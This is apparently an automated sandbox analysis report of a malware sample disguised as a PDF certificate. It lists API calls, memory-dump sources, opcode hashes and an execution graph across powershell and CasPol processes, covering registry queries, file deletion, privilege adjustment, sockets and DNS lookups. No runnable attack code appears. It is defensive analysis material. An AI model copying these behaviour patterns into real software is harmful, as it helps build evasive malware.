          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Window$CountCreateDestroyDialogParamShowTick
          • String ID:
          • API String ID: 2102729457-0
          • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
          • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
          • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
          • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
          APIs
          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77143420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
          • GlobalFree.KERNEL32(?), ref: 00403913
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Free$GlobalLibrary
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 1100898210-3355392842
          • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
          • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
          • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
          • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
          APIs
          • lstrlenW.KERNEL32(007B6800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
          • CharPrevW.USER32(007B6800,00000000,007B6800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CharPrevlstrlen
          • String ID: C:\Users\user\Desktop
          • API String ID: 2709904686-3370423016
          • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
          • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
          • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
          • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
          APIs
          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
          • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
          • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: lstrlen$CharNextlstrcmpi
          • String ID:
          • API String ID: 190613189-0
          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
          • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
          • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8
          Memory Dump Source
          • Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_323d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e19ba056c2e4ffa23c76449015d1b7f4437aad72d9100d363602482136f8c3e9
          • Instruction ID: 7d85b6c97b8fed02074d4e8284e7e8e0ca5c23bc3e1ba85993087d1ebb4ae3da
          • Opcode Fuzzy Hash: e19ba056c2e4ffa23c76449015d1b7f4437aad72d9100d363602482136f8c3e9
          • Instruction Fuzzy Hash: 320121624493C05FD7128B25CC94792BFA8EF53720F1984D7D8948F197C2685885C771
          Memory Dump Source
          • Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_323d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 781be46b46a5e52eb5b793655516fff665c01bfb2ccff5b313cdc72b3112b5e7
          • Instruction ID: f0d96b19613b0d22c351e34e1147c360b482255d6c68a8c46fd87b0532adf7a4
          • Opcode Fuzzy Hash: 781be46b46a5e52eb5b793655516fff665c01bfb2ccff5b313cdc72b3112b5e7
          • Instruction Fuzzy Hash: 2701F7B15143409BE7108A65CCC4BA3FF9CDF42764F18C05AEC540B242C2799585CAB1
          Memory Dump Source
          • Source File: 00000004.00000002.24014127216.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_323d000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e33340489b467ea2351d9214d2ab9080651b52ea95ed4f69e0c1dbbce1c0fa84
          • Instruction ID: c00abad5db4bb46ef8d17f047bdf0b95125c42e40136f11adc05a01ffe4ad3fc
          • Opcode Fuzzy Hash: e33340489b467ea2351d9214d2ab9080651b52ea95ed4f69e0c1dbbce1c0fa84
          • Instruction Fuzzy Hash: B82125B1514340EFDB05DF14E8C0B26BB66FB85324F24C5A9E8090B266C336E496CBA2

          Execution Graph

          Execution Coverage:16.1%
          Dynamic/Decrypted Code Coverage:84.7%
          Signature Coverage:0%
          Total number of Nodes:183
          Total number of Limit Nodes:10
          execution_graph 12823 2180b042 12824 2180b092 CreateActCtxA 12823->12824 12825 2180b0a0 12824->12825 12753 23d61352 12754 23d6138a DuplicateHandle 12753->12754 12756 23d613d7 12754->12756 12757 23d62752 12758 23d6278d getaddrinfo 12757->12758 12760 23d627ff 12758->12760 12761 2180a406 12763 2180a42c FindWindowW 12761->12763 12764 2180a45a 12763->12764 12765 23d6305e 12766 23d6308a K32EnumProcesses 12765->12766 12768 23d630a6 12766->12768 12769 23d60eda 12771 23d60f12 CreateFileW 12769->12771 12772 23d60f61 12771->12772 12773 23d611da 12774 23d6122a GetTempFileNameW 12773->12774 12775 23d61232 12774->12775 12826 23d60e1a 12827 23d60e40 CreateDirectoryW 12826->12827 12829 23d60e67 12827->12829 12776 23d608c2 12777 23d608f7 GetTokenInformation 12776->12777 12779 23d60934 12777->12779 12780 2180a996 12781 2180a9f3 12780->12781 12782 2180a9c8 SetWindowLongW 12780->12782 12781->12782 12783 2180a9dd 12782->12783 12830 2180aada 12831 2180ab12 RegOpenKeyExW 12830->12831 12833 2180ab68 12831->12833 12784 23d61f4a 12786 23d61f82 ConvertStringSecurityDescriptorToSecurityDescriptorW 12784->12786 12787 23d61fc3 12786->12787 12834 23d61c0a 12836 23d61c42 WSASocketW 12834->12836 12837 23d61c7e 12836->12837 12838 23bd0660 12839 23bd0665 12838->12839 12840 23bd0674 12839->12840 12842 23bd0682 12839->12842 12843 23bd0610 12842->12843 12844 23bd068f 12842->12844 12843->12840 12855 23bd43d0 12844->12855 12858 23bd43c0 12844->12858 12845 23bd07e2 12861 23bd54f8 12845->12861 12865 23bd5508 12845->12865 12846 23bd0800 12869 23bd59d1 12846->12869 12877 23bd5958 12846->12877 12881 23bd5948 12846->12881 12847 23bd0806 12847->12840 12886 23bd4511 12855->12886 12856 23bd43ed 12856->12845 12859 23bd43ed 12858->12859 12860 23bd4511 4 API calls 12858->12860 12859->12845 12860->12859 12862 23bd5514 12861->12862 12863 23bd5525 12862->12863 12864 23bd5948 2 API calls 12862->12864 12863->12846 12864->12863 12867 23bd5514 12865->12867 12866 23bd5525 12866->12846 12867->12866 12868 23bd5948 2 API calls 12867->12868 12868->12866 12870 23bd5960 12869->12870 12872 23bd59df 12869->12872 12876 23bd59d1 2 API calls 12870->12876 12871 23bd5974 12871->12847 12923 23d61556 12872->12923 12927 23d61533 12872->12927 12873 23bd5a02 12873->12847 12876->12871 12878 23bd5961 12877->12878 12879 23bd5965 12878->12879 12880 23bd59d1 2 API calls 12878->12880 12879->12847 12880->12879 12883 23bd5957 12881->12883 12884 23bd58d8 12881->12884 12882 23bd5965 12882->12847 12883->12882 12885 23bd59d1 2 API calls 12883->12885 12884->12847 12885->12882 12887 23bd4544 12886->12887 12891 23bd45b9 12887->12891 12899 23bd45c8 12887->12899 12888 23bd4560 12888->12856 12907 23d6042a 12891->12907 12911 23d603f7 12891->12911 12892 23bd45f9 12892->12888 12893 23bd45f5 12893->12892 12915 23d604dc 12893->12915 12919 23d60516 12893->12919 12894 23bd4620 12894->12888 12901 23bd45f5 12899->12901 12905 23d603f7 RegOpenKeyExA 12899->12905 12906 23d6042a RegOpenKeyExA 12899->12906 12900 23bd45f9 12900->12888 12901->12900 12903 23d60516 RegQueryValueExA 12901->12903 12904 23d604dc RegQueryValueExA 12901->12904 12902 23bd4620 12902->12888 12903->12902 12904->12902 12905->12901 12906->12901 12910 23d60465 RegOpenKeyExA 12907->12910 12909 23d604ae 12909->12893 12910->12909 12912 23d6042a RegOpenKeyExA 12911->12912 12914 23d604ae 12912->12914 12914->12893 12916 23d60516 RegQueryValueExA 12915->12916 12918 23d605b9 12916->12918 12918->12894 12920 23d60551 RegQueryValueExA 12919->12920 12922 23d605b9 12920->12922 12922->12894 12926 23d61591 DeleteFileA 12923->12926 12925 23d615ce 12925->12873 12926->12925 12928 23d61556 DeleteFileA 12927->12928 12930 23d615ce 12928->12930 12930->12873 12788 23d60276 12790 23d602ae CreateMutexW 12788->12790 12791 23d602f1 12790->12791 12935 2180abe2 12936 2180ac17 RegQueryValueExW 12935->12936 12938 2180ac6b 12936->12938 12792 23d60ff2 12793 23d61027 GetFileType 12792->12793 12795 23d61054 12793->12795 12939 23d610b2 12941 23d610e7 ReadFile 12939->12941 12942 23d61119 12941->12942 12943 23d60032 12944 23d60058 DeleteFileW 12943->12944 12946 23d60074 12944->12946 12796 2180bc26 12797 2180bc5b PostMessageW 12796->12797 12798 2180bc8f 12796->12798 12799 2180bc70 12797->12799 12798->12797 12947 2180bee6 12948 2180bf12 DispatchMessageW 12947->12948 12949 2180bf3b 12947->12949 12950 2180bf27 12948->12950 12949->12948 12800 23d620fa 12802 23d62132 MapViewOfFile 12800->12802 12803 23d62181 12802->12803 12804 2180b8ae 12805 2180b8e3 SendMessageW 12804->12805 12806 2180b90e 12804->12806 12807 2180b8f8 12805->12807 12806->12805 12951 2180b7ee 12952 2180b864 12951->12952 12953 2180b82c CreateIconFromResourceEx 12951->12953 12952->12953 12954 2180b83a 12953->12954 12955 2180a5ee 12956 2180a664 12955->12956 12957 2180a62c DuplicateHandle 12955->12957 12956->12957 12958 2180a63a 12957->12958 12808 2180a832 12809 2180a894 12808->12809 12810 2180a85e OleInitialize 12808->12810 12809->12810 12811 2180a86c 12810->12811 12959 2180a372 12960 2180a3c7 12959->12960 12961 2180a39e SetErrorMode 12959->12961 12960->12961 12962 2180a3b3 12961->12962 12812 23d62ee2 12813 23d62f11 AdjustTokenPrivileges 12812->12813 12815 23d62f33 12813->12815 12816 23d62962 12817 23d629b2 FormatMessageW 12816->12817 12818 23d629ba 12817->12818 12819 23d62d62 12820 23d62d8b LookupPrivilegeValueW 12819->12820 12822 23d62db2 12820->12822 12963 23bddc48 12964 23bddc51 12963->12964 12967 23bddc98 12964->12967 12965 23bddc82 12968 23bddca0 12967->12968 12969 23bddcb9 12968->12969 12971 23bddcca 12968->12971 12969->12965 12972 23bddcfb 12971->12972 12973 23bddd32 12972->12973 12975 23bdddf0 12972->12975 12973->12969 12976 23bdde19 12975->12976 12977 23bdde54 12976->12977 12980 23d618e6 12976->12980 12984 23d61922 12976->12984 12977->12973 12981 23d61922 DnsQuery_A 12980->12981 12983 23d61980 12981->12983 12983->12977 12985 23d61972 DnsQuery_A 12984->12985 12986 23d61980 12985->12986 12986->12977
          APIs
          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 23D62F2B
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: AdjustPrivilegesToken
          • String ID:
          • API String ID: 2874748243-0
          • Opcode ID: eef5e3a213a5c1b5d7b04ba894820e9efdf493e1ae24c85cfe4e7eb50b16c74d
          • Instruction ID: 5750275be4c5c2bf9c0b75f39608d9375db2fa344440172d02e3ec5d05314341
          • Opcode Fuzzy Hash: eef5e3a213a5c1b5d7b04ba894820e9efdf493e1ae24c85cfe4e7eb50b16c74d
          • Instruction Fuzzy Hash: 8121B076509780AFDB128F25DC44B52BFB8EF06710F0C84DAE9858F163D275E908DB62
          APIs
          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 23D62F2B
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: AdjustPrivilegesToken
          • String ID:
          • API String ID: 2874748243-0
          • Opcode ID: 10cde86178e59f1a6e2cc589f38fac229e392b168dea9428a5be6b055926c824
          • Instruction ID: ea07be081f69523704cc999b3737d4fae7b98d5b964e35c0877abd33590de9e2
          • Opcode Fuzzy Hash: 10cde86178e59f1a6e2cc589f38fac229e392b168dea9428a5be6b055926c824
          • Instruction Fuzzy Hash: 5D115E355002049FDB20CF56E984B56FBE8EF04620F08C4AEED958B652D375E458DF62
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 18f62f1a4ee4d0b58752cbcd6bdfd9dc5d9bf5c5157b4d9557f79b25ed7b6fb4
          • Instruction ID: d96199bc8b218ca827268d810c2885ef16ec6355a585c15b3e8a79d9fc7ca53b
          • Opcode Fuzzy Hash: 18f62f1a4ee4d0b58752cbcd6bdfd9dc5d9bf5c5157b4d9557f79b25ed7b6fb4
          • Instruction Fuzzy Hash: 1612BB32E10299CFCB14EF68C5846AEB7F2FF88315F1885B9D8169B265DB789941CF40
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fa9831268a0201329960e4c2fa5f2a939bb90e1efb54d9313f7c5810767817fe
          • Instruction ID: 0ad21285ac18d84e9f08a1485c4f8cfcd160e2ccfe778e70e84db567982d0f82
          • Opcode Fuzzy Hash: fa9831268a0201329960e4c2fa5f2a939bb90e1efb54d9313f7c5810767817fe
          • Instruction Fuzzy Hash: F512BA32A04229CFDB04EF38C490669B7F2FF98706F6985BAD415DB2A5DB78D941CB40
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fc10537c3fa40a8ef921bf86f54779790bb26369335c75231af1f2711277fcb4
          • Instruction ID: e973064051f95149390d4766cef7de1208de5feb42cb47e85083de741eec0d2c
          • Opcode Fuzzy Hash: fc10537c3fa40a8ef921bf86f54779790bb26369335c75231af1f2711277fcb4
          • Instruction Fuzzy Hash: EA818E32F011198BD704DF68D894A5EB7E7AFC8214F2984B9E409DB36ADE35DC018B91

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 7 23d61bbb-23d61bdb 8 23d61bfd-23d61c6e 7->8 9 23d61bdd-23d61bfa 7->9 14 23d61c70-23d61c78 WSASocketW 8->14 15 23d61cbf-23d61cc4 8->15 9->8 17 23d61c7e-23d61c94 14->17 15->14 18 23d61cc6-23d61ccb 17->18 19 23d61c96-23d61cbc 17->19 18->19
          APIs
          • WSASocketW.WS2_32(?,?,?,?,?), ref: 23D61C76
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Socket
          • String ID:
          • API String ID: 38366605-0
          • Opcode ID: bdf69e595a44ba401419baa1c8e7d16e9892321d7c7dc721bab3552743209555
          • Instruction ID: d0a1a0410996f158ef000aa2820a288769065b03069c5f571e332c9fefc741f0
          • Opcode Fuzzy Hash: bdf69e595a44ba401419baa1c8e7d16e9892321d7c7dc721bab3552743209555
          • Instruction Fuzzy Hash: B631AF714097C06FD7129F61DC58B56BFB4EF07210F0988DFE9858B2A3D265A409CB62

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 23d6115b-23d6125b GetTempFileNameW
          APIs
          • GetTempFileNameW.KERNEL32(?,00000EA8,?,?), ref: 23D6122A
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileNameTemp
          • String ID:
          • API String ID: 745986568-0
          • Opcode ID: 0f57d110bd9a83bf7fe31d1808688e56e313427fe329bab6287b4ba926a34e3c
          • Instruction ID: e3cb5ba94064d393d80f95c7745e2569d887c9e5623781b688dc9b2f75e7e9dc
          • Opcode Fuzzy Hash: 0f57d110bd9a83bf7fe31d1808688e56e313427fe329bab6287b4ba926a34e3c
          • Instruction Fuzzy Hash: 1E31786150E3C06FD3038B258C61B62BFB4AF47624F0E81DBD8849F5A3D6286919C7B2

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 22 23d61330-23d613c7 27 23d6141f-23d61424 22->27 28 23d613c9-23d613d1 DuplicateHandle 22->28 27->28 29 23d613d7-23d613e9 28->29 31 23d61426-23d6142b 29->31 32 23d613eb-23d6141c 29->32 31->32
          APIs
          • DuplicateHandle.KERNELBASE(?,00000EA8), ref: 23D613CF
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DuplicateHandle
          • String ID:
          • API String ID: 3793708945-0
          • Opcode ID: 3eb58a089ce6366ef653c0795652ea4994a7a705be61fdf91403590a1adb337d
          • Instruction ID: d6ed2ce3774a1595723887d507c075ba601cfd91109e38ba0d1eaf6dc56b3ffe
          • Opcode Fuzzy Hash: 3eb58a089ce6366ef653c0795652ea4994a7a705be61fdf91403590a1adb337d
          • Instruction Fuzzy Hash: 5A31D476500344AFEB229F61DC45F67BBACEF05224F08889EF985CB152D324A519CB71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 36 23d604dc-23d605a2 41 23d605e7-23d605ec 36->41 42 23d605a4-23d605b7 RegQueryValueExA 36->42 41->42 43 23d605ee-23d605f3 42->43 44 23d605b9-23d605e4 42->44 43->44
          APIs
          • RegQueryValueExA.KERNEL32(?,00000EA8), ref: 23D605AA
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: 060c7e1675ee1caf8ee5ef1cc4fb60305d94fb154431d5fcf0321000496d9b05
          • Instruction ID: 9ae2d238c56be71b05ddb1689e296d5cf312cc18416ba879ed29fdc47f0598ea
          • Opcode Fuzzy Hash: 060c7e1675ee1caf8ee5ef1cc4fb60305d94fb154431d5fcf0321000496d9b05
          • Instruction Fuzzy Hash: 9531F575004384AFE722CF10DC44FA6FBB8EF06714F0844DEFA848B192D3A5A949CB61

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 49 23d60882-23d60924 55 23d60926-23d6092e GetTokenInformation 49->55 56 23d60971-23d60976 49->56 57 23d60934-23d60946 55->57 56->55 59 23d60978-23d6097d 57->59 60 23d60948-23d6096e 57->60 59->60
          APIs
          • GetTokenInformation.KERNELBASE(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D6092C
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: InformationToken
          • String ID:
          • API String ID: 4114910276-0
          • Opcode ID: 5c804b5417d2823673e176a0b00c84962571ca78bf39196d923ca2daa0a332a6
          • Instruction ID: 0e1524600c97f0ad939bfc2c9ddfe65a7ab933a6bd5027bc0688cea5210bde82
          • Opcode Fuzzy Hash: 5c804b5417d2823673e176a0b00c84962571ca78bf39196d923ca2daa0a332a6
          • Instruction Fuzzy Hash: 693195765097846FD712CF21DC44FA6BFB8EF46714F0884DBE984CB153D265A908CBA1

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 63 23d62730-23d627ef 69 23d62841-23d62846 63->69 70 23d627f1-23d627f9 getaddrinfo 63->70 69->70 72 23d627ff-23d62811 70->72 73 23d62813-23d6283e 72->73 74 23d62848-23d6284d 72->74 74->73
          APIs
          • getaddrinfo.WS2_32(?,00000EA8), ref: 23D627F7
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: getaddrinfo
          • String ID:
          • API String ID: 300660673-0
          • Opcode ID: 537aca5ed347cf9b5a0576f80777d44ae89c26caa02abec9d70c8d835b6291af
          • Instruction ID: 845c2024db9d2ebdcf34dc02735a85a3bef59a8160787dd12b65e50c2fae4a75
          • Opcode Fuzzy Hash: 537aca5ed347cf9b5a0576f80777d44ae89c26caa02abec9d70c8d835b6291af
